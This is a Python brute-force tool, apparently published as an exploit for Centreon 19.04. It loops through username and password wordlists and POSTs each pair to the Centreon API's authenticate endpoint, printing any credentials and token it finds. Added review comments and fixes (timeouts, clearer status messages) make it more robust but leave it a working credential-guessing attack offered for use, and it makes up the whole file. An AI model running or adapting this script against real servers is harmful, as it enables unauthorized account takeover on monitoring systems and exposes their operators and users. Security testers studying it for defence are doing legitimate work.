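#!/usr/bin/env python3
# Tested on Centreon API 19.04.0
# Centreon 19.04 - Login Password Bruteforcer
# Written on 6 Nov 2019
# Referencing API Authentication of the Centreon API document
# Author: st4rry
# centbruteon.py
# Centreon Download Link: https://download.centreon.com/#version-Older
# Dependencies: sys, requests, argparse, termcolor, os
#
# Review notes (grounded in the code below):
# - Every attempt is a single POST to /centreon/api/index.php?action=authenticate
#   carrying 'username' and 'password' form fields. Nothing in this script
#   spaces the requests out, so a run is a back-to-back series of
#   authentication requests from one client -- presumably visible in the
#   server's access/authentication logs; confirm against the deployment.
# - Success is decided by HTTP 200 alone; the response body is never parsed.
# - The scheme defaults to plain HTTP, so the submitted credentials and any
#   returned body cross the network unencrypted unless --https is given.
# - Candidate passwords and the response body of a successful login are
#   printed to stdout, so terminal scrollback and captured output end up
#   holding secrets.

import sys
import requests
import argparse
from termcolor import colored
import os

# Seconds allowed for each request. requests has no default timeout, so a
# server that stops answering would otherwise block the run forever.
REQUEST_TIMEOUT = 10


def main():
    """Parse the command line and run the login check against one server.

    Builds the base URL from -u/-p/--https, loads the password wordlist (and
    the username wordlist when -L is used) and hands them to the single-user
    or multi-user loop. Exits with status 1 when no arguments are given, when
    neither -l nor -L is supplied, or when a request fails at transport level.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
    parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
    parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP')
    parser.add_argument('-l', dest='username', help='Specific username')
    parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist')
    parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True)
    parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification')
    parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle')

    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    args = parser.parse_args()

    protocol = 'https' if args.https else 'http'
    # NOTE(review): -p keeps its default of 80 even when --https is set, so
    # an HTTPS run needs an explicit port.
    server = f"{protocol}://{args.host}:{args.port}"
    user = args.username
    userfile = args.userfile
    dirlo = '/centreon/api/index.php?action=authenticate'

    # argparse.FileType returns handles that are already open; read them
    # inside a with-block so they are closed instead of leaking.
    with args.passwfile as handle:
        passfile = handle.read().splitlines()

    # --insecure switches certificate validation off, which leaves the
    # credentials and the returned body readable by anyone able to intercept
    # the TLS session. A --ca-bundle path takes precedence over --insecure
    # when both are given.
    verify_ssl = not args.insecure
    if args.ca_bundle:
        verify_ssl = args.ca_bundle

    if not user and not userfile:
        print(colored('Something went wrong!', 'red'))
        sys.exit(1)

    try:
        if user:
            if userfile:
                # -l wins over -L; release the unused wordlist handle.
                userfile.close()
            brute_force_single_user(server, user, passfile, dirlo, verify_ssl)
        else:
            with userfile as handle:
                usrwl = handle.read().splitlines()
            brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl)
    except requests.RequestException as err:
        # Connection, TLS and timeout errors previously surfaced as a raw
        # traceback; report them and exit non-zero instead.
        print(colored(f'Request failed: {err}', 'red'))
        sys.exit(1)


def _attempt_login(server, user, password, dirlo, verify_ssl):
    """Submit one username/password pair and print the outcome.

    Returns True when the server answers HTTP 200, otherwise False.
    Transport errors (requests.RequestException) propagate to the caller.
    """
    data = {'username': user, 'password': password}
    r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl,
                      timeout=REQUEST_TIMEOUT)

    print('Processing...')
    # The candidate password is echoed in clear text on every attempt.
    print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
          colored(' Username: ', 'yellow') + colored(user, 'yellow') +
          colored(' Password: ', 'yellow') + colored(password, 'yellow'))

    if r.status_code == 200:
        print(colored('Credentials found: username: ', 'green') + colored(user, 'green') +
              colored(' password: ', 'green') + colored(password, 'green') +
              colored(' server: ', 'green') + colored(server, 'green'))
        # The raw response body is printed under the author's 'Token' label;
        # treat this output as a secret.
        print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
        print('\n')
        return True

    if r.status_code == 403:
        print(colored('403 - Unauthenticated!', 'red'))
    else:
        # The original printed "403" for every non-200 answer, which hid
        # wrong paths, server errors and any other status behind a false label.
        print(colored(f'Unexpected HTTP status {r.status_code}', 'red'))
    return False


def brute_force_single_user(server, user, passfile, dirlo, verify_ssl):
    """Try each password in *passfile* for one username, stopping at the first 200.

    Args:
        server: Base URL, scheme://host:port.
        user: Username submitted with every attempt.
        passfile: Iterable of candidate passwords.
        dirlo: Path and query string of the authenticate endpoint.
        verify_ssl: Value passed to requests as ``verify`` (bool or CA bundle path).
    """
    for password in passfile:
        if _attempt_login(server, user, password, dirlo, verify_ssl):
            break


def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl):
    """Try every password in *passfile* for every username in *usrwl*.

    Args:
        server: Base URL, scheme://host:port.
        usrwl: Iterable of usernames.
        passfile: Iterable of candidate passwords.
        dirlo: Path and query string of the authenticate endpoint.
        verify_ssl: Value passed to requests as ``verify`` (bool or CA bundle path).
    """
    for usr in usrwl:
        for password in passfile:
            # NOTE(review): unlike brute_force_single_user there is no break
            # after a 200, so the remaining passwords are still submitted for
            # the same username. Behaviour kept as the author wrote it.
            _attempt_login(server, usr, password, dirlo, verify_ssl)


if __name__ == '__main__':
    main()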